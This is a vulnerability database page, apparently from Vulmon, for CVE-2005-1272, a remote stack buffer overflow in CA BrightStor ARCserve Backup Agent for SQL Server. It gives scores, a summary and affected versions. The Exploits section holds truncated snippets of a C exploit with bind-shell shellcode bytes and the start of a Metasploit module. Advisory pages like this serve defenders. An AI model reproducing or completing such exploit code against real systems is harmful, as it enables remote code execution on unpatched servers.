7.5
CVSSv2

CVE-2005-1272

Published: 05/08/2005 Updated: 07/04/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote malicious users to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

ca brightstor arcserve backup 9.0.1

ca brightstor arcserve backup 9.0_1

ca brightstor arcserve backup agent 9.0.1

ca brightstor enterprise backup agent 10.5

ca brightstor arcserve backup 11.1

ca brightstor arcserve backup agent 11

ca brightstor enterprise backup agent 10.0

ca brightstor arcserve backup 11.0

ca brightstor arcserve backup agent 11.1

ca brightstor arcserve backup agent 11.0

broadcom brightstor enterprise backup 10.0

broadcom brightstor enterprise backup 10.5

Exploits

/* * CA BrightStor ARCserve Backup Agent for SQL - dbasqlrexe * * cybertronic[at]gmx[dot]net * */ #include <stdioh> #include <sys/socketh> #include <netinet/inh> #include <netdbh> #define PORT 6070 unsigned char bindshell[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32" "\x94\x81\xee\xfc\xf ...
## # $Id: sql_agentrb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class Metasp ...